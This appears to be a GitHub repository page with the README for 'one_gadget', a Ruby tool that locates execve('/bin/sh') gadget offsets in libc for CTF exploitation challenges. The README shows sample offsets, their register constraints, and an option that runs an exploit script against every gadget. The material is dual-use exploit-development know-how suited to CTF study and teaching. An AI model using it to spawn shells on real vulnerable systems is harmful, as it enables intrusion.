e28085f083 | ||
---|---|---|
bin | ||
examples | ||
lib | ||
spec | ||
tasks | ||
.gitignore | ||
.rubocop.yml | ||
.travis.yml | ||
Gemfile | ||
Gemfile.lock | ||
LICENSE | ||
README.md | ||
Rakefile | ||
builds_list | ||
one_gadget.gemspec |
README.md
One Gadget
When playing ctf pwn challenges we usually needs the one-gadget of execve('/bin/sh', NULL, NULL)
.
This gem provides such gadget finder, no need to use IDA-pro every time like a fool.
Also provides the command-line tool one_gadget
for easy usage.
Note: Supports amd64 and i386!
Note2: still work in progress, the gem version might update frequently :p.
Install
Available on RubyGems.org!
gem install one_gadget
Usage
Command Line Tool
one_gadget
# Usage: one_gadget [file] [options]
# -b, --build-id BuildID BuildID[sha1] of libc.
# -f, --[no-]force-file Force search gadgets in file instead of build id first.
# -r, --[no-]raw Output gadgets offset only, split with one space.
# -s, --script exploit-script Run exploit script with all possible gadgets.
# The script will be run as 'exploit-script $offset'.
one_gadget -b 60131540dadc6796cab33388349e6e4e68692053
# offset: 0x4526a
# constraints:
# [rsp+0x30] == NULL
#
# offset: 0xef6c4
# constraints:
# [rsp+0x50] == NULL
#
# offset: 0xf0567
# constraints:
# [rsp+0x70] == NULL
#
# offset: 0xf5b10
# constraints:
# [rbp-0xf8] == NULL
# rcx == NULL
one_gadget /lib/i386-linux-gnu/libc.so.6
# offset: 0x3ac69
# constraints:
# esi is the address of `rw-p` area of libc
# [esp+0x34] == NULL
#
# offset: 0x5fbbe
# constraints:
# esi is the address of `rw-p` area of libc
# eax == NULL
#
# offset: 0x12036c
# constraints:
# esi is the address of `rw-p` area of libc
# eax == NULL
Combine with exploit script
Pass your exploit script as one_gadget
's arguments, it can
try all gadgets one by one, so you don't need to try every possible gadgets manually.
one_gadget ./spec/data/libc-2.19.so -s 'echo "offset ->"'
Directly use in script
require 'one_gadget'
OneGadget.gadgets(file: '/lib/x86_64-linux-gnu/libc.so.6')
# => [283242, 980676, 984423, 1006352]